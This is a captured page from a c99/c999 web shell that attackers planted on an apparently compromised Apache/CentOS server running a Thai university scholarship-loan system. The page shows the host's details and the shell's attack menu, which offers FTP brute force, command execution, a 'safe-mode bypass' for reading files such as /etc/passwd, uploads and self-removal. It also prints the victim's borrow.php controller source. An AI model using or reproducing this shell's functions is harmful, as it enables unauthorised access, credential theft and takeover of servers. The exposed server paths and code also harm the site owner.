!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/controllers/esa/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.89%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     borrow.php (16.99 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include('sa_controller.php');
class 
Borrow extends Sa_controller {

        
// ##### start callback
    
function checkAcY($str) {
        
$this->load->model($this->config->item("rg_folder").'mo_rg_termconfig','tmc');

        
$con_qu_tmc = array('tmcAcY' => $str);
        
$qu_tmc $this->tmc->qryTmc($con_qu_tmc,'','');

        if(
$str=='') {
            
$this->form_validation->set_message('checkAcY','กรุณาป้อน%s');
            return 
false;
        } else if(
strlen($str)!=4) {
            
$this->form_validation->set_message('checkAcY','%sจะต้องเท่ากับ 4 หลัก');
            return 
false;
        }

        if(
$qu_tmc->num_rows()) {
            return 
true;
        } else {
            
$this->form_validation->set_message('checkAcY','%sไม่ถูกต้อง');
            return 
false;
        }
    }
    
// ##### end callback
    
    // autocomplete
    
function getBrw_source($mode){
        
$this->load->model($this->config->item('sa_folder').'sa_borrow_model','brw');
        
$rs $this->brw->getAuto($this->input->post('q'),$mode);
        
//echo $this->db->last_query();
        
foreach ($rs->result() as $row) {
                if(
$mode==1){
                    echo 
$row->brw_scholarship."\n";
                }else if(
$mode==2){
                    echo 
$row->brw_source."\n";
                }else if(
$mode==3){
                    echo 
$row->brw_type."\n";
                }
        }
    }
    
    function 
brw_input () {
        
$this->load->model($this->config->item('sa_folder').'sa_borrow_model','brw');
        
$this->load->model($this->config->item("rg_folder").'mo_rg_term','tm');
        
        
$rs_tm $this->tm->get_options('','','','y');
        
$rs_tm[''] = '-- เลือก ---';
        
$data['rs_tm'] = $rs_tm;
        
$data['brw_acY'] = $this->session->userdata('acY');
        
        
$brw_id $this->input->post('brw_id');
        
$data['acY_search'] = ($this->input->post('acY_search')) ? $this->input->post('acY_search') : '';
        
$data['tmId_search'] = ($this->input->post('tmId_search')) ? $this->input->post('tmId_search') : '';        
        
$data['v_search'] = ($this->input->post('v_search')) ? $this->input->post('v_search') : '';        

        
$this->brw->brw_id $brw_id;
        
$qu_brw $this->brw->get_by_key_2();
        if (
$qu_brw->num_rows()) {
            
$data['qu_brw'] = $qu_brw;
        }
        
        
//if($this->input->post('acY_search')){
        //$data['rs_brw'] = $this->brw->get_by_std($data['v_search']);
        
$data['rs_brw'] = $this->brw->get_by_acYtmIdstd($data['acY_search'], $data['tmId_search'],$data['v_search']);
        
$data['qu_brw'] = $this->brw->get_by_sumacYtmIdstd($data['acY_search'], $data['tmId_search'],$data['v_search']);
        
//}
        
        
$this->output("v_add_borrow",$data);
    }
    function 
brw_req_no_check($str)
    {
        
$this->load->model($this->config->item('sa_folder').'sa_borrow_model','brw');
        
$brw $this->brw;
        
$brw->brw_id trim($this->input->post('brw_id'));
        
$brw->get_by_key(TRUE);
        
$old_id $brw->brw_req_no;
        
$rs $brw->getByReq_no(trim($str));
        if(
$old_id!=trim($str)){
            if(
$rs->num_rows()>0){
                
$this->form_validation->set_message('brw_req_no_check','เลขที่คำร้องนี้มีแล้วในระบบ');
                return 
FALSE;
            }else{
                return 
TRUE;
            }
        }else{
            return 
TRUE;
        }
    }
    
    function 
test($age){
        if(!
is_numeric($age)) {
            echo 
"your not numeric";
        } else {
            echo 
"your age is $age";
        }
    }
    
    function 
brw_check_amt($str){
        if(
$str!=""){
            if(
$str>99999.99){
                
$this->form_validation->set_message('brw_check_amt','จำนวนเงินต้องน้อยกว่า 100,000 ');
                return 
FALSE;
            }else if(
$str<0){
                
$this->form_validation->set_message('brw_check_amt','จำนวนเงิน ต้องเป็นเลขที่มากกว่า 0');
                return 
FALSE;
            }else if(!
is_numeric($str)){
                
$this->form_validation->set_message('brw_check_amt','จำนวนเงิน ต้องเป็นเลขเท่านั้น');
                return 
FALSE;
            }else{
                return 
TRUE;
            }
        }else{
            return 
TRUE;
        }
    }
    
    function 
brw_check_year($str$field){
        
$end_date explode("/"$this->input->post($field));

        if ((
$end_date[2]+543) >= $str) { 
            return 
TRUE
        } else { 
            
$this->form_validation->set_message('brw_check_year''ปีการศึกษาที่ขอกู้ยืม จะต้องไม่น้อยกว่า หรือเท่ากับปีที่รับทุน'); return FALSE;
        }
    }

    function 
brw_insert_update() {
        if(
$this->input->post('btnCancel')){//click cancel button
            
redirect($this->config->item('sa_folder').'borrow/brw_input');
        }else{
            
$this->load->library('form_validation');
            
$this->form_validation->set_error_delimiters('<div>''</div>');
            
$this->form_validation->set_rules('brw_id'' ''trim|xss_clean');

            
$brw_id $this->input->post('brw_id');

            if(
$brw_id){
                
$this->form_validation->set_rules('std''รหัส/ชื่อ-สกุลนักศึกษา''trim|required|xss_clean');
            }else{
                
$this->form_validation->set_rules('wk11_co''รหัส/ชื่อ-สกุลนักศึกษา''trim|required|xss_clean');
            }
            
$this->form_validation->set_rules('brw_req_no''เลขที่คำร้องขอรับทุน''trim|required|xss_clean|callback_brw_req_no_check');
            
$this->form_validation->set_rules('brw_no''เลขที่สัญญา''trim|xss_clean');
            
$this->form_validation->set_rules('brw_scholarship''ชื่อทุน''trim|required|xss_clean');
            
$this->form_validation->set_rules('brw_source''แหล่งทุน/หน่วยงาน''trim|required|xss_clean');
            
$this->form_validation->set_rules('brw_type''ประเภททุน''trim|required|xss_clean');
            
$this->form_validation->set_rules('brw_amt''จำนวนเงิน''trim|xss_clean|callback_brw_check_amt');
            
$this->form_validation->set_rules('brw_receive_date''วันที่ได้รับทุน''trim|xss_clean');
            
$this->form_validation->set_rules('brw_status''สถานะการได้รับทุน''trim|required|xss_clean');
            
$this->form_validation->set_rules('brw_note''หมายเหตุ''trim|xss_clean');
            
$this->form_validation->set_rules('brw_acY','ปีการศึกษาที่ขอกู้ยืม','callback_checkAcY|callback_brw_check_year[brw_receive_date]');
            
$this->form_validation->set_rules('brw_tmId','ภาคการศึกษาที่ขอกู้ยืม','trim|required|xss_clean');

            if (
$this->form_validation->run() == FALSE) {
                
$this->brw_input();
            } else {
                
$this->db->trans_begin();

                
$this->load->model($this->config->item('rg_folder').'mo_rg_student','std');
                
$this->load->model($this->config->item('sa_folder').'sa_borrow_model','brw');

                
$rs explode("###", ($this->input->post('std') ? $this->input->post('std') : $this->input->post('wk11_co')));
                foreach (
$rs as $value) {
                    
$std explode(":"$value);

                    
$con_qu_std = array('stdCode' => $std[0]);
                    
$qu_std $this->std->qryStd($con_qu_std);
                    if (
$qu_std->num_rows()) {
                        
$this->brw->brw_id $brw_id;
                        
$this->brw->get_by_key(TRUE);

                        
$this->brw->brw_std_id $qu_std->row()->stdId;
                        
$this->brw->brw_req_no trim($this->input->post('brw_req_no'));
                        
$this->brw->brw_no trim($this->input->post('brw_no'));
                        
$this->brw->brw_scholarship trim($this->input->post('brw_scholarship'));
                        
$this->brw->brw_source trim($this->input->post('brw_source'));
                        
$this->brw->brw_type trim($this->input->post('brw_type'));
                        
$this->brw->brw_amt $this->input->post('brw_amt');
                        
$this->brw->brw_acY $this->input->post('brw_acY');
                        
$this->brw->brw_tmId $this->input->post('brw_tmId');
                        
$this->brw->brw_receive_date splitDateForm2($this->input->post('brw_receive_date'), '/');
                        
$this->brw->brw_status trim($this->input->post('brw_status'));
                        
$this->brw->brw_note trim($this->input->post('brw_note'));
                        
$this->brw->brw_update_date date('Y-m-d H:i:s');
                        
$this->brw->brw_update_us_login $this->session->userdata('UsLogin');

                        if (
$brw_id) {
                            
$this->brw->update();
                        } else {
                            
$this->brw->brw_create_date date('Y-m-d H:i:s');
                            
$this->brw->brw_create_us_login $this->session->userdata('UsLogin');
                            
$this->brw->insert();
                        }
                    }
                }

                if (
$this->db->trans_status() === false) {
                    
$this->db->trans_rollback();
                } else {
                    
$this->db->trans_commit();
                }

                
redirect($this->config->item('sa_folder').'borrow/brw_input');
            }
        }
    }

    function 
brw_delete () {
        
$this->load->model($this->config->item('sa_folder').'sa_borrow_model','brw');

        
$brw_id $this->input->post('brw_id');

        
$this->brw->brw_id $brw_id;
        
$this->brw->delete();

        
redirect($this->config->item('sa_folder').'borrow/brw_input');
    }

    function 
brw_file() {
        
$this->load->model($this->config->item('rg_folder').'mo_rg_news','nw');

        
$con_rs_nw = array('nwSystem'    => $this->config->item('sa_system'),
                           
'nwWorkFor'    => $this->config->item('nw_for_scholar'));
        
$ord_rs_nw = array('nwCreateDate'    => 'DESC');
        
$rs_nw $this->nw->qryNw($con_rs_nw$ord_rs_nw);
        
//echo $this->nw->db->last_query();die;
        
$data['rs_nw'] = $rs_nw;

        
// กรณี update
        
$nwId $this->input->post('nwId');
        
$con_qu_nw = array('nwId'    => $nwId);
        
$data['qu_nw'] = $this->nw->qryNw($con_qu_nw);
        
// จบกรณี update

        
$this->output("v_borrowFile",$data);
    }

    function 
brw_showDetail() {
        
$this->load->model($this->config->item("rg_folder").'mo_rg_news','nw');
        
$this->load->model($this->config->item("rg_folder").'mo_rg_newsfileupload','nwu');

        
$nwId $this->input->post('nwId');

        
$con_qu_nw = array('nwId'    => $nwId);
        
$data['qu_nw'] = $this->nw->qryNwJoinUmsystem($con_qu_nw);

        
$con_rs_nwu = array('nwuNwId'    => $nwId);
        
$data['rs_nwu'] = $this->nwu->qryNwu($con_rs_nwu);

        
$this->output_popup("v_borrowDetailFile",$data);
    }

    function 
brw_file_insert_update() {
        
$this->load->model($this->config->item('rg_folder').'mo_rg_news','nw');

        
$this->load->library('form_validation');
        
$this->form_validation->set_error_delimiters('<div>''</div>');
        
$this->form_validation->set_rules('nwId'' ''trim|xss_clean');
        
$this->form_validation->set_rules('nwTitle'' ''trim|required|xss_clean');
        
$this->form_validation->set_rules('dpUsed'' ''trim|required|xss_clean');

        
$dpUsed $this->input->post('dpUsed');
        if(
$dpUsed=='N') {    // ระบุวันที่
            
$this->form_validation->set_rules('nwFrDate'' ''trim|callback_checkFrDate[nwToDate]|xss_clean');
            
$this->form_validation->set_rules('nwToDate'' ''trim|xss_clean');

            
$nwFrDate splitDateForm2($this->input->post('nwFrDate'),'-');
            
$nwToDate splitDateForm2($this->input->post('nwToDate'),'-');
        } else {
            
$nwFrDate '0000-00-00';
            
$nwToDate '0000-00-00';
        }

        
$this->form_validation->set_rules('nwDetail'' ''trim|xss_clean');
        
$this->form_validation->set_rules('nwAnnoucedBy'' ''trim|required|xss_clean');

        
$nwId $this->input->post('nwId');
        
$nwTitle $this->input->post('nwTitle');
        
$nwDetail $this->input->post('nwDetail');
        
$nwAnnoucedBy $this->input->post('nwAnnoucedBy');
        
$nwCreateDate getNowDate();

        if (
$this->form_validation->run() == FALSE) {
            if(
$dpUsed=='N') {
                
$this->load->vars(array('passvalid'    => 1));
            }
            
$this->brw_file();
        } else {
            
$this->db->trans_begin();
            if(
$nwId) {
                
$this->nw->nwId $nwId;
                
$this->nw->get_by_key(TRUE);

                
$this->nw->nwTitle $nwTitle;
                
$this->nw->nwFrDate $nwFrDate;
                
$this->nw->nwToDate $nwToDate;
                
$this->nw->nwAnnoucedBy $nwAnnoucedBy;
                
$this->nw->nwDetail $nwDetail;
                
$this->nw->nwCreateDate date('Y-m-d H:i:s');
                
$this->nw->nwCreateUserId $this->session->userdata('UsLogin');
                
$this->nw->nwUpdateDate date('Y-m-d H:i:s');
                
$this->nw->nwUpdateUserId $this->session->userdata('UsLogin');
                
$this->nw->update();

                
$id $nwId;
            } else {
                
$con_qu_nw = array('nwTitle'        => $nwTitle,
                                   
'nwSystem'        => $this->config->item('sa_system'),
                                   
'nwCreateDate'    => $nwCreateDate."%");
                
$qu_nw $this->nw->qryNw($con_qu_nw);
                if(
$qu_nw->num_rows()==0) {
                    
$this->nw->nwId "";
                    
$this->nw->nwSystem $this->config->item('sa_system');
                    
$this->nw->nwTitle $nwTitle;
                    
$this->nw->nwFrDate $nwFrDate;
                    
$this->nw->nwToDate $nwToDate;
                    
$this->nw->nwAnnoucedBy $nwAnnoucedBy;
                    
$this->nw->nwPicture ''// ****************
                    
$this->nw->nwDetail $nwDetail;
                    
$this->nw->nwCreateDate date('Y-m-d H:i:s');
                    
$this->nw->nwCreateUserId $this->session->userdata('UsLogin');
                    
$this->nw->nwUpdateDate date('Y-m-d H:i:s');
                    
$this->nw->nwUpdateUserId $this->session->userdata('UsLogin');
                    
$this->nw->nwWorkFor $this->config->item('nw_for_scholar');;
                    
$this->nw->insert();

                    
$id $this->nw->last_insert_id();
                } else {
                    
// ข้อมูลซ้ำ
                    
redirect($this->config->item("sa_folder")."borrow/brw_file");
                }
            }

            if (
$this->db->trans_status() === false) {
                
$this->db->trans_rollback();
            } else {
                
$this->db->trans_commit();
            }

            
redirect($this->config->item("sa_folder")."borrow/brw_attachfile/$id");
        }
    }

    function 
brw_attachfile($id=0) {
        
$this->load->model($this->config->item("rg_folder").'mo_rg_news','nw');
        
$this->load->model($this->config->item("rg_folder").'mo_rg_newsfileupload','nwu');

        
$this->nw->nwId $id;
        
$data['qu_nw'] = $this->nw->get_by_key();

        
$con_rs_nwu = array('nwuNwId'    => $id);
        
$data['rs_nwu'] = $this->nwu->qryNwu($con_rs_nwu);

        
$this->output("v_borrowFileAttach",$data);
    }

    function 
checkDocName($str) {
        
// ชื่อเอกสาร : $str
        
$nwId $this->input->post('nwId');

        
$this->load->model($this->config->item("rg_folder").'mo_rg_newsfileupload','nwu');

        if(
$str=="") {
            
$this->form_validation->set_message('checkDocName','กรุณาป้อน%s');
            return 
false;
        } else {
            
$con_rs_nwu = array('nwuFileName'    => $str,
                                
'nwuNwId'        => $nwId);
            
$rs_nwu $this->nwu->qryNwu($con_rs_nwu);
            if(
$rs_nwu->num_rows()) {
                
$this->form_validation->set_message('checkDocName','ชื่อเอกสารซ้ำ กรุณาป้อนชื่อใหม่');
                return 
false;
            } else {
                return 
true;
            }
        }
    }

    function 
brw_attachFile_insert_update() {
        
$this->load->model($this->config->item("rg_folder").'mo_rg_news','nw');
        
$this->load->model($this->config->item("rg_folder").'mo_rg_newsfileupload','nwu');

        
$this->load->library('form_validation');
        
$this->form_validation->set_error_delimiters('<div class="error">','</div>');
        
$this->form_validation->set_rules('nwId',' ','trim|required|xss_clean');
        
$this->form_validation->set_rules('docName',' ','trim|required|callback_checkDocName|xss_clean');
        
$this->form_validation->set_rules('docFile',' ','trim|xss_clean');

        
$this->load->library('upload');
        foreach(
$_FILES as $key => $value) {
            
$config['upload_path'] = $this->config->item('rg_upload_docNews');
            
$config['allowed_types'] = '*';
            
$config['max_size'] = $this->config->item('rg_upload_maxsize');
            
$config['file_name'] = "file_".date('dmY_His');

            
$this->upload->initialize($config);
            if (
$this->upload->do_upload($key)){
                
$data = array('upload_data' => $this->upload->data());
                
$path $data['upload_data']['file_name'];
            } else {
                
$error = array('error' => $this->upload->display_errors());
                
$this->form_validation->set_rules('docFile'trim($error['error']), 'callback_checkupload');
            }
        }
        
// ************ upload file
        
$nwId $this->input->post('nwId');
        if(
$this->form_validation->run() == true) {
            
$this->db->trans_begin();

            
// ตรวจสอบชื่อเอกสาร
            
$con_rs_nwu = array('nwuNwId'    => $nwId,
                                
'nwuFileName'    => $this->input->post('docName'));
            
$rs_nwu $this->nwu->qryNwu($con_rs_nwu);
            
$file_version $rs_nwu->num_rows();
            
// จบตรวจสอบชื่อเอกสาร

            
$this->nwu->nwuId "";
            
$this->nwu->nwuSeq $this->nwu->getNextSeqByNwuNwId($nwId);
            
$this->nwu->nwuNwId $nwId;
            
$this->nwu->nwuFileName $this->input->post('docName').(($file_version==0) ? "" "[".$file_version."]");
            
$this->nwu->nwuPath $path;
            
$this->nwu->nwuCreateDate date('Y-m-d H:i:s');
            
$this->nwu->nwuUserId $this->session->userdata('UsLogin');
            
$this->nwu->insert();

            if(
$this->db->trans_status() === false) {
                
$this->db->trans_rollback();
            } else {
                
$this->db->trans_commit();
            }

            
redirect($this->config->item("sa_folder")."borrow/brw_attachfile/$nwId");
        } else {
            
$this->brw_attachfile($nwId);
        }
    }

    function 
brw_deleteFile() {
        
$this->load->model($this->config->item("rg_folder").'mo_rg_newsfileupload','nwu');

        
$nwuId $this->input->post('nwuId');
        
$nwuNwId $this->input->post('nwuNwId');

        
$this->nwu->nwuId $nwuId;
        
$this->nwu->delete();

        
redirect($this->config->item("sa_folder")."borrow/brw_attachfile/$nwuNwId");
    }

    function 
brw_deleteFileHead() {
        
$this->load->model($this->config->item("rg_folder").'mo_rg_news','nw');
        
$this->load->model($this->config->item("rg_folder").'mo_rg_newsfileupload','nwu');

        
$nwId $this->input->post('nwId');

        
$con_rs_nw = array('nwuNwId'    => $nwId);
        
$this->nwu->delNwu($con_rs_nw);
        
        
$this->nw->nwId $nwId;
        
$this->nw->delete();

        
redirect($this->config->item('sa_folder').'borrow/brw_file');
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0121 ]--